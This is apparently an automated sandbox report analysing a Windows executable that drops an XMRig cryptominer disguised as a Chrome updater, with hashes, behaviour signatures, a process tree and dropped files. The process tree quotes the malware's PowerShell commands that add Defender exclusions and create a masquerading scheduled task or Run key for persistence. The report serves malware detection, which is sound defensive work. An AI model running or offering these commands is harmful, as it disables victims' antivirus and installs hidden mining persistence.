Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1800s
  • max time network
    1800s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/LM3BR4UBmKBzBP5H.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 30 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 31 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 31 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3552
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:3080
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\LM3BR4UBmKBzBP5H.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4136
          • C:\Windows\System32\choice.exe
            choice /C Y /N /D Y /T 3
            4⤵
              PID:1384
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3560
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2456
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5080
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:3820
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4508
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4844
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:3852
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
              2⤵
              • Drops file in Program Files directory
              • Suspicious use of WriteProcessMemory
              PID:3436
            • C:\Windows\System32\conhost.exe
              C:\Windows\System32\conhost.exe qtdiqnkejoz
              2⤵
              • Suspicious use of NtCreateUserProcessOtherParentProcess
              • Suspicious behavior: EnumeratesProcesses
              PID:2472
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4904
            • C:\Windows\System32\cmd.exe
              C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
              2⤵
              • Drops file in Program Files directory
              PID:3652
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic PATH Win32_VideoController GET Name, VideoProcessor
            1⤵
            • Detects videocard installed
            PID:3824
          • C:\Windows\system32\rundll32.exe
            "C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
            1⤵
              PID:476
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k UnistackSvcGroup
              1⤵
                PID:4068

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Program Files\Google\Chrome\updater.exe
                Filesize

                110KB

                MD5

                0ff15db38a12a78aab37286fec652bde

                SHA1

                20e9bcd1e027505658a90a514b9e1a004d72139c

                SHA256

                96ecbfb0d788d00deea70eefa9e378a14eb45ec8b7975cdb9d082b23fa9d5ff6

                SHA512

                01fffb77eafd3ff16c2155c71faaaef75567844a7f2dbff1f800947565170538af9417bc400cae4e811d935ed09a6c7fdf44ef81af161f1773a80aadc4f5cd9a

              • C:\Program Files\Google\Chrome\updater.exe
                Filesize

                2.0MB

                MD5

                a16a669a09bf158058b83e04e69fe38e

                SHA1

                f6c94763850d9e590d86057139e8895a7aacdeea

                SHA256

                cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

                SHA512

                658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

              • C:\Program Files\Google\Libs\g.log
                Filesize

                226B

                MD5

                fdba80d4081c28c65e32fff246dc46cb

                SHA1

                74f809dedd1fc46a3a63ac9904c80f0b817b3686

                SHA256

                b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

                SHA512

                b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                Filesize

                2KB

                MD5

                d85ba6ff808d9e5444a4b369f5bc2730

                SHA1

                31aa9d96590fff6981b315e0b391b575e4c0804a

                SHA256

                84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                SHA512

                8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                944B

                MD5

                d28a889fd956d5cb3accfbaf1143eb6f

                SHA1

                157ba54b365341f8ff06707d996b3635da8446f7

                SHA256

                21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

                SHA512

                0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                1KB

                MD5

                d3a17a56edbadfc922fc753a8035926a

                SHA1

                38ad9857a8aac26c19621bca828df812b2cb067b

                SHA256

                23aa261ff68defc62f426bda23fbea0e24f0b917fed735041ff62549c3b0bdc6

                SHA512

                9249913cdf44419420c00204585f3b13eda0711585edd0d2dc0accee87686f6460466bdcee1dc1db4c3e69f89414d5503bfc31d62e92940b39a4b93736719e44

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5bl1b45h.3rb.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                Filesize

                4KB

                MD5

                bdb25c22d14ec917e30faf353826c5de

                SHA1

                6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                SHA256

                e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                SHA512

                b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

              • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                1KB

                MD5

                b42c70c1dbf0d1d477ec86902db9e986

                SHA1

                1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                SHA256

                8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                SHA512

                57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

              • memory/2456-27-0x00007FF9A8990000-0x00007FF9A9451000-memory.dmp
                Filesize

                10.8MB

              • memory/2456-28-0x00000232FD0F0000-0x00000232FD100000-memory.dmp
                Filesize

                64KB

              • memory/2456-29-0x00000232FD0F0000-0x00000232FD100000-memory.dmp
                Filesize

                64KB

              • memory/2456-31-0x00000232FD0F0000-0x00000232FD100000-memory.dmp
                Filesize

                64KB

              • memory/2456-32-0x00000232FD0F0000-0x00000232FD100000-memory.dmp
                Filesize

                64KB

              • memory/2456-34-0x00007FF9A8990000-0x00007FF9A9451000-memory.dmp
                Filesize

                10.8MB

              • memory/2472-127-0x00007FF6BE4B0000-0x00007FF6BE4C6000-memory.dmp
                Filesize

                88KB

              • memory/2472-134-0x00007FF6BE4B0000-0x00007FF6BE4C6000-memory.dmp
                Filesize

                88KB

              • memory/3080-36-0x00007FF6B1F60000-0x00007FF6B2171000-memory.dmp
                Filesize

                2.1MB

              • memory/3080-0-0x00007FF6B1F60000-0x00007FF6B2171000-memory.dmp
                Filesize

                2.1MB

              • memory/3560-16-0x00007FF9A8990000-0x00007FF9A9451000-memory.dmp
                Filesize

                10.8MB

              • memory/3560-13-0x000001A8BB130000-0x000001A8BB140000-memory.dmp
                Filesize

                64KB

              • memory/3560-12-0x000001A8BB130000-0x000001A8BB140000-memory.dmp
                Filesize

                64KB

              • memory/3560-11-0x00007FF9A8990000-0x00007FF9A9451000-memory.dmp
                Filesize

                10.8MB

              • memory/3560-1-0x000001A8BB310000-0x000001A8BB332000-memory.dmp
                Filesize

                136KB

              • memory/3852-179-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-136-0x00000238B65D0000-0x00000238B65F0000-memory.dmp
                Filesize

                128KB

              • memory/3852-163-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-161-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-159-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-157-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-155-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-153-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-151-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-149-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-147-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-145-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-143-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-141-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-139-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-165-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-177-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-175-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-173-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-137-0x00000238B6C00000-0x00000238B6C20000-memory.dmp
                Filesize

                128KB

              • memory/3852-181-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-171-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-169-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-120-0x00000238B5EA0000-0x00000238B5EC0000-memory.dmp
                Filesize

                128KB

              • memory/3852-121-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-167-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-183-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-185-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-126-0x00000238B6590000-0x00000238B65D0000-memory.dmp
                Filesize

                256KB

              • memory/3852-187-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-128-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-129-0x00000238B65D0000-0x00000238B65F0000-memory.dmp
                Filesize

                128KB

              • memory/3852-130-0x00000238B6C00000-0x00000238B6C20000-memory.dmp
                Filesize

                128KB

              • memory/3852-132-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-133-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-189-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/3852-135-0x00007FF7E1ED0000-0x00007FF7E26C4000-memory.dmp
                Filesize

                8.0MB

              • memory/4508-83-0x000001B17F190000-0x000001B17F196000-memory.dmp
                Filesize

                24KB

              • memory/4508-81-0x000001B17F1B0000-0x000001B17F1CA000-memory.dmp
                Filesize

                104KB

              • memory/4508-66-0x000001B1643B0000-0x000001B1643C0000-memory.dmp
                Filesize

                64KB

              • memory/4508-88-0x00007FF9A8990000-0x00007FF9A9451000-memory.dmp
                Filesize

                10.8MB

              • memory/4508-85-0x000001B1643B0000-0x000001B1643C0000-memory.dmp
                Filesize

                64KB

              • memory/4508-84-0x000001B17F1A0000-0x000001B17F1AA000-memory.dmp
                Filesize

                40KB

              • memory/4508-64-0x000001B1643B0000-0x000001B1643C0000-memory.dmp
                Filesize

                64KB

              • memory/4508-82-0x000001B17F160000-0x000001B17F168000-memory.dmp
                Filesize

                32KB

              • memory/4508-65-0x000001B1643B0000-0x000001B1643C0000-memory.dmp
                Filesize

                64KB

              • memory/4508-80-0x000001B17F150000-0x000001B17F15A000-memory.dmp
                Filesize

                40KB

              • memory/4508-79-0x000001B17F170000-0x000001B17F18C000-memory.dmp
                Filesize

                112KB

              • memory/4508-78-0x000001B17F000000-0x000001B17F00A000-memory.dmp
                Filesize

                40KB

              • memory/4508-76-0x000001B17EF20000-0x000001B17EF3C000-memory.dmp
                Filesize

                112KB

              • memory/4508-77-0x000001B17EF40000-0x000001B17EFF5000-memory.dmp
                Filesize

                724KB

              • memory/4508-63-0x00007FF9A8990000-0x00007FF9A9451000-memory.dmp
                Filesize

                10.8MB

              • memory/4844-113-0x000001AD5C300000-0x000001AD5C310000-memory.dmp
                Filesize

                64KB

              • memory/4844-116-0x00007FF9A8990000-0x00007FF9A9451000-memory.dmp
                Filesize

                10.8MB

              • memory/4844-114-0x000001AD5C300000-0x000001AD5C310000-memory.dmp
                Filesize

                64KB

              • memory/4844-101-0x000001AD5C300000-0x000001AD5C310000-memory.dmp
                Filesize

                64KB

              • memory/4844-102-0x000001AD5C300000-0x000001AD5C310000-memory.dmp
                Filesize

                64KB

              • memory/4844-103-0x000001AD5C300000-0x000001AD5C310000-memory.dmp
                Filesize

                64KB

              • memory/4844-100-0x00007FF9A8990000-0x00007FF9A9451000-memory.dmp
                Filesize

                10.8MB

              • memory/4904-122-0x00007FF61AC60000-0x00007FF61AE71000-memory.dmp
                Filesize

                2.1MB

              • memory/4904-53-0x00007FF61AC60000-0x00007FF61AE71000-memory.dmp
                Filesize

                2.1MB

              • memory/5080-52-0x00007FF9A8990000-0x00007FF9A9451000-memory.dmp
                Filesize

                10.8MB

              • memory/5080-49-0x000001E846E00000-0x000001E846E10000-memory.dmp
                Filesize

                64KB

              • memory/5080-48-0x000001E846E00000-0x000001E846E10000-memory.dmp
                Filesize

                64KB

              • memory/5080-47-0x00007FF9A8990000-0x00007FF9A9451000-memory.dmp
                Filesize

                10.8MB